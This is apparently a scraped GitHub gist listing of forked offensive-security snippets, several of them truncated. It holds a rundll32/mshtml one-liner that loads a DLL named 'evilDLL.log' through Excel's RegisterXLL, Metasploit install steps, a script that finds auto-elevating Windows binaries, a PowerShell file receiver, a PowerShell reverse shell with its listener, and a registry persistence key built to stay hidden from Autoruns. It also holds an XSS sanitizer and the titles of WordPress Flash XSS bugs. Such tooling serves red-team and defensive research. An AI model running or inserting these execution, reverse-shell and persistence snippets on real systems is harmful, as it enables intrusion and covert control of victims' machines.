sasqwatch / excel.bat
Created Apr 10, 2017 — forked from ryhanson/
Execute DLL via the Excel.Application object's RegisterXLL() method
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
sasqwatch / gist:9a84a57ab4536a631ce9cb8c9740ec56
Created Apr 13, 2017 — forked from dafthack/gist:8aa4ff60cd9352448a372ce1a7b2e27e
Easy Metasploit Install on Windows Subsystem for Linux
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux
1.) Enable Developer Mode
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1"
2.) Enable Windows Subsystem for Linux
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux
3.) Reboot
sasqwatch /
Created May 25, 2017 — forked from riyazwalikar/
Python script to find all Windows binaries with autoElevate=True (uses sigcheck obviously)
# Usage: C:\Windows\System32\
# Needs sigcheck.exe in path
import sys
import os
import glob
import subprocess
if len(sys.argv) < 2:
    print("Usage: <PATH>")
sasqwatch / receivefile.ps1
Created May 31, 2017 — forked from staaldraad/receivefile.ps1
Small PowerShell script to bind to a port, accept a connection and stream to a file. Useful for `cat blah.exe | nc 8080`
$socket = new-object System.Net.Sockets.TcpListener('', 1080);
if($socket -eq $null){
    exit 1;
}
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
$file = 'c:/afile.exe';
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write');
sasqwatch / mini-reverse.ps1
Created May 31, 2017 — forked from staaldraad/mini-reverse.ps1
A reverse shell in PowerShell
$socket = new-object System.Net.Sockets.TcpClient('', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
$read = $null;
sasqwatch / mini-reverse-listener.ps1
Created May 31, 2017 — forked from staaldraad/mini-reverse-listener.ps1
A reverse shell listener in PowerShell
$socket = new-object System.Net.Sockets.TcpListener('', 413);
if($socket -eq $null){
    exit 1
}
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
sasqwatch / test.reg
Created Jul 5, 2017 — forked from hasherezade/test.reg
Demo: persistence key not visible for sysinternals autoruns (in a default configuration - read more:
Windows Registry Editor Version 5.00
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
View XSS Protection in 5 common contexts
* XSS protection function for HTML context only
* @usecases
* <title>use this function if output reflects here or as a content of any HTML tag.</title>
* e.g., <span>use this function if output reflects here</span>
* e.g., <div>use this function if output reflects here</div>
* @description
* Sanitize/Filter < and > so that attacker can not leverage them for JavaScript execution.
sasqwatch /
Created Oct 19, 2017 — forked from cure53/
WordPress SOME bug in plupload.flash.swf
sasqwatch /
Created Oct 19, 2017 — forked from cure53/
WordPress Flash XSS in flashmediaelement.swf